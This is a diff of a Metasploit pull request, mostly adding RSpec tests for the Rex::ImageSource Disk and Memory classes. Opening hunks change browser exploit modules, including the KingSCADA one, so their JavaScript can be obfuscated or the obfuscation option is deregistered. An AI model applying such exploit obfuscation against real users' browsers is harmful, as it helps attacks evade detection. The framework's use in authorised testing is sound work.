+    |)
+
+    template = %Q|<!DOCTYPE html>
+<html>
+  <head>
+    <meta http-equiv='Cache-Control' content='no-cache'/>
+    <meta http-equiv="X-UA-Compatible" content="IE=edge" >
+    <script>
+    #{js.to_s}
     </script>
   </head>
-  <body onload='strike();'></body>
+  <body onload='#{js.sym('strike')}();'></body>
 </html>
     |
 

--- a/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb
+++ b/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb
@@ -58,6 +58,8 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jan 14 2014'))
+
+    deregister_options('JsObfuscate')
   end
 
   def on_request_exploit(cli, request, target_info)

--- a/spec/lib/rex/image_source/disk_spec.rb
+++ b/spec/lib/rex/image_source/disk_spec.rb
@@ -24,7 +24,7 @@ describe Rex::ImageSource::Disk do
       described_class.allocate
     end
 
-    context "when _len not send as argument" do
+    context "when _len not sent as argument" do
       let(:_file) { file }
 
       it "initializes size to file length" do
@@ -33,7 +33,7 @@ describe Rex::ImageSource::Disk do
       end
     end
 
-    context "when _offset not send argument" do
+    context "when _offset not sent as argument" do
       let(:_file) { file }
       it "initializes file_offset to 0" do
         disk_class.send(:initialize, file)
@@ -43,7 +43,7 @@ describe Rex::ImageSource::Disk do
   end
 
   describe "#read" do
-    context "when offset minor than 0" do
+    context "when offset less than 0" do
       let(:offset) { -1 }
       let(:len) { 20 }
 
@@ -52,7 +52,7 @@ describe Rex::ImageSource::Disk do
       end
     end
 
-    context "when offset plus len major than size" do
+    context "offset plus len greater than size" do
       let(:offset) { 0 }
       let(:len) { 16000 }
 

--- a/spec/lib/rex/image_source/disk_spec.rb
+++ b/spec/lib/rex/image_source/disk_spec.rb
@@ -13,23 +13,111 @@ describe Rex::ImageSource::Disk do
     File.new(path)
   end
 
+  subject do
+    described_class.new(file)
+  end
+
   describe "#initialize" do
     subject(:disk_class) do
       described_class.allocate
     end
 
+    context "when _len not send as argument" do
+      let(:_file) { file }
+
+      it "initializes size to file length" do
+        disk_class.send(:initialize, file)
+        expect(disk_class.size).to eq(4608)
+      end
+    end
+
+    context "when _offset not send argument" do
+      let(:_file) { file }
+      it "initializes file_offset to 0" do
+        disk_class.send(:initialize, file)
+        expect(disk_class.file_offset).to eq(0)
+      end
+    end
   end
 
   describe "#read" do
-    context "offset minor than 0" do
+    context "when offset minor than 0" do
       let(:offset) { -1 }
       let(:len) { 20 }
+
+      it "raises a RangeError" do
+        expect { subject.read(offset, len) }.to raise_error(RangeError)
+      end
     end
 
+    context "when offset plus len major than size" do
+      let(:offset) { 0 }
+      let(:len) { 16000 }
+
+      it "raises a RangeError" do
+        expect { subject.read(offset, len) }.to raise_error(RangeError)
+      end
+    end
+
+    context "when offset and len inside range" do
+      let(:offset) { 0 }
+      let(:len) { 2 }
+
+      it "returns file contents" do
+        expect(subject.read(offset, len)). to eq('MZ')
+      end
+    end
+
+    context "instance with tampered size" do
+      let(:tampered_size) { 6000 }
+
+      subject(:tampered) do
+        described_class.new(file, 0, tampered_size)
+      end
+
+      context "when reading offset after the real file length" do
+        let(:offset) { 5000 }
+        let(:len) { 2 }
+        it "returns nil" do
+          expect(tampered.read(offset, len)).to be_nil
+        end
+      end
+    end
   end
 
   describe "#index" do
+    let(:search) { 'MZ' }
 
+    it "returns index of first search occurrence" do
+      expect(subject.index(search)).to eq(0)
+    end
+
+    context "when offset out of range" do
+      it "returns nil" do
+        expect(subject.index(search, 6000)).to be_nil
+      end
+    end
+
+    context "when search string not found" do
+      it "returns nil" do
+        expect(subject.index(search, 4600)).to be_nil
+      end
+    end
+
+    context "instance with tampered size" do
+      let(:tampered_size) { 6000 }
+
+      subject(:tampered) do
+        described_class.new(file, 0, tampered_size)
+      end
+
+      context "when searching offset after the real file length" do
+        let(:offset) { 5000 }
+        it "raises NoMethodError" do
+          expect{ tampered.index(search, offset) }.to raise_error(NoMethodError)
+        end
+      end
+    end
   end
 
   describe "#subsource" do
@@ -39,5 +127,4 @@ describe Rex::ImageSource::Disk do
   describe "#close" do
 
   end
-
 end

--- a/spec/lib/rex/image_source/disk_spec.rb
+++ b/spec/lib/rex/image_source/disk_spec.rb
@@ -17,6 +17,8 @@ describe Rex::ImageSource::Disk do
     described_class.new(file)
   end
 
+  it_should_behave_like 'Rex::ImageSource::ImageSource'
+
   describe "#initialize" do
     subject(:disk_class) do
       described_class.allocate

--- a/spec/lib/rex/image_source/disk_spec.rb
+++ b/spec/lib/rex/image_source/disk_spec.rb
@@ -121,17 +121,35 @@ describe Rex::ImageSource::Disk do
   end
 
   describe "#subsource" do
-    let(:offset) { 0 }
+    let(:offset) { 2 }
     let(:len) { 512 }
 
     it "returns a new Rex::ImageSource::Disk" do
       expect(subject.subsource(offset, len)).to be_kind_of(described_class)
     end
 
-    
+    it "returns a new Rex::ImageSource::Disk with same file" do
+      expect(subject.subsource(offset, len).file).to eq(subject.file)
+    end
+
+    it "returns a new Rex::ImageSource::Disk with provided size" do
+      expect(subject.subsource(offset, len).size).to eq(len)
+    end
+
+    it "returns a new Rex::ImageSource::Disk with file_offset added to the original" do
+      expect(subject.subsource(offset, len).file_offset).to eq(offset + subject.file_offset)
+    end
   end
 
   describe "#close" do
+    it "returns nil" do
+      expect(subject.close).to be_nil
+    end
 
+    it "closes the associated file" do
+      expect(subject.file.closed?).to be_falsey
+      subject.close
+      expect(subject.file.closed?).to be_truthy
+    end
   end
 end

--- a/spec/lib/rex/image_source/disk_spec.rb
+++ b/spec/lib/rex/image_source/disk_spec.rb
@@ -1,0 +1,43 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/image_source/disk'
+
+describe Rex::ImageSource::Disk do
+
+  let(:path) do
+    File.join(Msf::Config.data_directory, "templates", "template_x86_windows_old.exe")
+  end
+
+  let(:file) do
+    File.new(path)
+  end
+
+  describe "#initialize" do
+    subject(:disk_class) do
+      described_class.allocate
+    end
+
+  end
+
+  describe "#read" do
+    context "offset minor than 0" do
+      let(:offset) { -1 }
+      let(:len) { 20 }
+    end
+
+  end
+
+  describe "#index" do
+
+  end
+
+  describe "#subsource" do
+
+  end
+
+  describe "#close" do
+
+  end
+
+end

--- a/spec/lib/rex/image_source/disk_spec.rb
+++ b/spec/lib/rex/image_source/disk_spec.rb
@@ -121,7 +121,14 @@ describe Rex::ImageSource::Disk do
   end
 
   describe "#subsource" do
+    let(:offset) { 0 }
+    let(:len) { 512 }
 
+    it "returns a new Rex::ImageSource::Disk" do
+      expect(subject.subsource(offset, len)).to be_kind_of(described_class)
+    end
+
+    
   end
 
   describe "#close" do

--- a/spec/lib/rex/image_source/memory_spec.rb
+++ b/spec/lib/rex/image_source/memory_spec.rb
@@ -5,9 +5,31 @@ require 'rex/image_source/memory'
 
 describe Rex::ImageSource::Memory do
 
+  let(:raw_data) { "ABCDEFGHIJKLMNOP"}
+
+  subject do
+    described_class.new(raw_data)
+  end
+
   describe "#initialize" do
     subject(:memory_class) do
       described_class.allocate
+    end
+
+    it "initializes size to data length" do
+      memory_class.send(:initialize, raw_data)
+      expect(memory_class.size).to eq(raw_data.length)
+    end
+
+    it "initializes file_offset to 0 by default" do
+      memory_class.send(:initialize, raw_data)
+      expect(memory_class.file_offset).to eq(0)
+    end
+
+    context "when using nil as data" do
+      it "raises an error" do
+        expect { memory_class.send(:initialize, nil) }.to raise_error(NoMethodError)
+      end
     end
   end
 

--- a/spec/lib/rex/image_source/memory_spec.rb
+++ b/spec/lib/rex/image_source/memory_spec.rb
@@ -149,7 +149,41 @@ describe Rex::ImageSource::Memory do
   end
 
   describe "#index" do
+    let(:found) { 'FG' }
+    let(:not_found) { 'XYZ' }
 
+    context "when search available substring" do
+      it "returns the index of the first occurrence" do
+        expect(subject.index(found)).to eq(5)
+      end
+
+      context "when using negative offset" do
+        let(:offset) { -14 }
+        it "returns the index of the first occurrence" do
+          expect(subject.index(found, offset)).to eq(5)
+        end
+      end
+
+      context "when using positive offset" do
+        let(:offset) { 1 }
+        it "returns the index of the first occurrence" do
+          expect(subject.index(found, offset)).to eq(5)
+        end
+      end
+    end
+
+    context "when search not available substring" do
+      it "returns nil" do
+        expect(subject.index(not_found)).to be_nil
+      end
+    end
+
+    context "when using negative offset" do
+      let(:offset) { -1 }
+      it "start to search from offset from the end of the string" do
+        expect(subject.index(found, offset)).to be_nil
+      end
+    end
   end
 
 end

--- a/spec/lib/rex/image_source/memory_spec.rb
+++ b/spec/lib/rex/image_source/memory_spec.rb
@@ -96,7 +96,9 @@ describe Rex::ImageSource::Memory do
   end
 
   describe "#close" do
-
+    it "returns nil" do
+      expect(subject.close).to be_nil
+    end
   end
 
   describe "#index" do

--- a/spec/lib/rex/image_source/memory_spec.rb
+++ b/spec/lib/rex/image_source/memory_spec.rb
@@ -92,7 +92,54 @@ describe Rex::ImageSource::Memory do
   end
 
   describe "#subsource" do
+    let(:offset) { 2 }
+    let(:len) { 10 }
 
+    it "returns a new Rex::ImageSource::Memory" do
+      expect(subject.subsource(offset, len)).to be_kind_of(described_class)
+    end
+
+    it "returns a new Rex::ImageSource::Memory with provided size" do
+      expect(subject.subsource(offset, len).size).to eq(len)
+    end
+
+    it "returns a new Rex::ImageSource::Memory with file_offset added to the original" do
+      expect(subject.subsource(offset, len).file_offset).to eq(offset + subject.file_offset)
+    end
+
+    it "returns a new Rex::ImageSource::Memory with rawdata from the original" do
+      expect(subject.subsource(offset, len).rawdata).to eq(subject.rawdata[offset, len])
+    end
+
+    context "when offset is out of range" do
+      let(:offset) { 20 }
+      let(:len) { 2 }
+
+      it "raises an error" do
+        expect { subject.subsource(offset, len) }.to raise_error(NoMethodError)
+      end
+    end
+
+    context "when len is bigger than source rawdata" do
+      let(:offset) { 2 }
+      let(:len) { 20 }
+
+      it "returns a new Rex::ImageSource::Memory" do
+        expect(subject.subsource(offset, len)).to be_kind_of(described_class)
+      end
+
+      it "returns a new Rex::ImageSource::Memory with provided size truncated" do
+        expect(subject.subsource(offset, len).size).to eq(14)
+      end
+
+      it "returns a new Rex::ImageSource::Memory with file_offset added to the original" do
+        expect(subject.subsource(offset, len).file_offset).to eq(offset + subject.file_offset)
+      end
+
+      it "returns a new Rex::ImageSource::Memory with rawdata truncated" do
+        expect(subject.subsource(offset, len).rawdata).to eq('CDEFGHIJKLMNOP')
+      end
+    end
   end
 
   describe "#close" do

--- a/spec/lib/rex/image_source/memory_spec.rb
+++ b/spec/lib/rex/image_source/memory_spec.rb
@@ -1,0 +1,30 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/image_source/memory'
+
+describe Rex::ImageSource::Memory do
+
+  describe "#initialize" do
+    subject(:memory_class) do
+      described_class.allocate
+    end
+  end
+
+  describe "#read" do
+
+  end
+
+  describe "#subsource" do
+
+  end
+
+  describe "#close" do
+
+  end
+
+  describe "#index" do
+
+  end
+
+end

--- a/spec/lib/rex/image_source/memory_spec.rb
+++ b/spec/lib/rex/image_source/memory_spec.rb
@@ -34,7 +34,7 @@ describe Rex::ImageSource::Memory do
   end
 
   describe "#read" do
-    context "when offset and len inside range" do
+    context "when offset is positive" do
       let(:offset) { 1 }
       let(:len) { 10 }
 
@@ -46,8 +46,47 @@ describe Rex::ImageSource::Memory do
         expect(subject.read(offset, len).length).to eq(10)
       end
 
-      it "returns an String with contents starting at provided offset" do
+      it "returns an String with _raw_data contents starting at provided offset" do
         expect(subject.read(offset, len)).to start_with('BCD')
+      end
+    end
+
+    context "when offset is negative" do
+      let(:offset) { -5 }
+      let(:len) { 2 }
+
+      it "returns an String" do
+        expect(subject.read(offset, len)).to be_a_kind_of(String)
+      end
+
+      it "returns an String of provided length" do
+        expect(subject.read(offset, len).length).to eq(2)
+      end
+
+      it "offset is counted from the end of the _raw_data" do
+        expect(subject.read(offset, len)).to eq('LM')
+      end
+    end
+
+    context "when offset is out of range" do
+      let(:offset) { 20 }
+      let(:len) { 2 }
+
+      it "returns nil" do
+        expect(subject.read(offset, len)).to be_nil
+      end
+    end
+
+    context "when len is bigger than _raw_data" do
+      let(:offset) { 0 }
+      let(:len) { 20 }
+
+      it "returns an String" do
+        expect(subject.read(offset, len)).to be_a_kind_of(String)
+      end
+
+      it "returns an String truncated to available contents" do
+        expect(subject.read(offset, len).length).to eq(raw_data.length)
       end
     end
   end

--- a/spec/lib/rex/image_source/memory_spec.rb
+++ b/spec/lib/rex/image_source/memory_spec.rb
@@ -11,6 +11,8 @@ describe Rex::ImageSource::Memory do
     described_class.new(raw_data)
   end
 
+  it_should_behave_like 'Rex::ImageSource::ImageSource'
+
   describe "#initialize" do
     subject(:memory_class) do
       described_class.allocate

--- a/spec/lib/rex/image_source/memory_spec.rb
+++ b/spec/lib/rex/image_source/memory_spec.rb
@@ -5,7 +5,7 @@ require 'rex/image_source/memory'
 
 describe Rex::ImageSource::Memory do
 
-  let(:raw_data) { "ABCDEFGHIJKLMNOP"}
+  let(:raw_data) { 'ABCDEFGHIJKLMNOP' }
 
   subject do
     described_class.new(raw_data)
@@ -34,7 +34,22 @@ describe Rex::ImageSource::Memory do
   end
 
   describe "#read" do
+    context "when offset and len inside range" do
+      let(:offset) { 1 }
+      let(:len) { 10 }
 
+      it "returns an String" do
+        expect(subject.read(offset, len)).to be_a_kind_of(String)
+      end
+
+      it "returns an String of provided length" do
+        expect(subject.read(offset, len).length).to eq(10)
+      end
+
+      it "returns an String with contents starting at provided offset" do
+        expect(subject.read(offset, len)).to start_with('BCD')
+      end
+    end
   end
 
   describe "#subsource" do

--- a/spec/support/shared/examples/rex/image_source/image_source.rb
+++ b/spec/support/shared/examples/rex/image_source/image_source.rb
@@ -1,0 +1,23 @@
+shared_examples_for "Rex::ImageSource::ImageSource" do
+
+  describe "#read_asciiz" do
+    let(:offset) { 0 }
+
+    it "returns an String" do
+      expect(subject.read_asciiz(offset)).to be_kind_of(String)
+    end
+
+    it "returns a null free String" do
+      expect(subject.read_asciiz(offset)).to_not include("\x00")
+    end
+
+    context "when offset bigger than available data" do
+      let(:offset) { 12345678 }
+
+      it "returns an empty String" do
+        expect(subject.read_asciiz(offset)).to be_empty
+      end
+    end
+  end
+
+end


### PR DESCRIPTION
These modules use BrowserExploitServer, so they should be updated.  You will see two types of changes:
- [ ] Modules that get deregistered: they don't use JavaScript. ms14_012_cmarkup_uaf.rb is a little bit different, because if obfuscated, the Flash portion won't know what function to call.
- [ ] Modules that use obfuscation: because they can. You should try test these, as many as possible.

Note: The Firefox and Android ones are untouched because they are in a separate pull request. <-- Merged already.

This replaces #3850
